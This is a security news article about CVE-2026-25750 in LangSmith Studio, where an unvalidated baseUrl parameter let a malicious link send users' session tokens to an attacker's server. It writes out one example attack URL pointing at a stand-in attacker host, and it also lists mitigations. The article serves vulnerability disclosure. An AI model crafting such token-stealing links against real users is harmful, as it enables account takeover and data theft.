A vulnerability in LangSmith, a widely used AI observability platform, could have allowed attackers to hijack user accounts and access sensitive enterprise data flowing through large language model (LLM) systems.
Researchers at Miggo Security discovered the flaw, which could allow token theft and account takeover if a logged-in user visited a malicious webpage.
The vulnerability “… exposed users to potential token theft and account takeover,” said the researchers.
How CVE-2026-25750 Enables Account Takeover
LangSmith plays a central role in modern AI development and operations, acting as an observability layer for organizations building and deploying large language model (LLM) applications.
The platform is widely used to monitor model behavior, troubleshoot errors, and analyze execution traces generated during AI workflows.
In practice, this means LangSmith processes enormous volumes of telemetry and debugging data as companies refine and maintain their AI systems.
Because LangSmith sits at the intersection of application logic, internal tools, and enterprise data pipelines, it often contains highly sensitive operational information.
Trace logs can capture detailed records of how an AI system interacts with databases, APIs, and internal services during runtime.
According to Miggo Security’s research, attackers who successfully exploited the vulnerability could potentially access sensitive data embedded within these logs — including internal SQL queries, proprietary system prompts, API responses, or even customer records.
For organizations relying on LangSmith to observe LLM workflows, an account compromise could therefore expose not only chat logs but also the underlying logic and data flows powering their AI systems.
How the LangSmith Vulnerability Works
The vulnerability, tracked as CVE-2026-25750, originated from a configuration feature within LangSmith Studio, the platform’s developer interface.
Studio is designed to provide flexibility for developers who may want to run the interface locally or in remote environments while still accessing their authenticated cloud account.
To support this capability, the application accepts a baseUrl parameter, which specifies the backend API endpoint that the Studio interface should communicate with.
Under normal circumstances, this parameter allows developers to redirect API calls to different environments, such as staging or development systems.
Previously, the application did not validate the domain supplied in the baseUrl parameter, allowing the frontend to trust the user-provided value and send API requests — including authentication credentials — to any specified destination.
How Attackers Could Trigger the Exploit
This lack of validation created an opportunity for attackers to craft a malicious URL designed to redirect authenticated requests.
For example, an attacker could generate a link such as:
https://smith.langchain.com/studio/?baseUrl=https://attacker-server.com
If a victim who was already logged into LangSmith visited a webpage that automatically triggered this URL — through a malicious script or embedded redirect — the browser would load the legitimate LangSmith Studio interface.
However, instead of sending API requests to the official LangSmith backend, the requests would be silently redirected to the attacker-controlled server.
Because the victim already had an active authenticated session, the browser would include the user’s session credentials with the request.
The attacker could then intercept the request, capture the session token, and use it to impersonate the victim.
What Attackers Can Access
Researchers said the stolen session token remained valid for about five minutes — enough time for attackers to access the victim’s account and retrieve data or modify settings.
Successful exploitation could allow attackers to steal system prompts that define how an organization’s AI behaves, exfiltrate tool inputs and outputs that may contain sensitive data such as PII, PHI, or financial records, and modify or delete projects.
At the time of publication, there is no evidence that the vulnerability has been exploited in the wild, and a fix has been released to address the issue.
Mitigating Risks in AI Monitoring Platforms
As AI observability platforms become more embedded in enterprise environments, they are emerging as attractive targets for attackers.
The LangSmith vulnerability illustrates how configuration or business logic flaws can expose sensitive data flowing through AI systems.
Organizations should treat these platforms as critical infrastructure and apply the same security rigor used to protect core cloud services and data pipelines.
- Patch self-hosted LangSmith deployments to the latest version to ensure the Allowed Origins policy blocks malicious baseUrl requests.
- Monitor logs and platform activity for unusual API calls, unexpected outbound requests, or abnormal access to trace data that could indicate token misuse.
- Rotate session tokens, API keys, and other credentials if compromise is suspected, and enforce shorter session lifetimes where possible.
- Limit sensitive data exposure within AI observability traces by sanitizing prompts, responses, and tool outputs before they reach monitoring systems.
- Enforce identity controls such as MFA, SSO policies, and least-privilege access for observability platforms and AI tooling.
- Implement network and browser security controls — such as DNS filtering, outbound traffic restrictions, and secure browser policies — to prevent connections to attacker-controlled domains.
- Regularly test incident response plans, build playbooks around exploitation of AI observability platforms, and use attack simulation tools.
Collectively, these measures help organizations reduce their exposure to account takeover risks while building greater resilience against attacks targeting AI observability platforms.
AI Infrastructure Is Expanding the Attack Surface
The LangSmith vulnerability reflects a broader shift in how organizations should think about AI infrastructure.
Observability platforms now sit at the center of many AI pipelines, collecting trace data that may include proprietary prompts, operational workflows, and other sensitive enterprise information.
While these tools are designed to improve debugging and transparency, their access to internal systems can make them attractive targets if security controls are weak.
This growing reliance on interconnected AI platforms is one reason organizations are turning to zero trust solutions, which assume no system, application or user should be trusted by default.
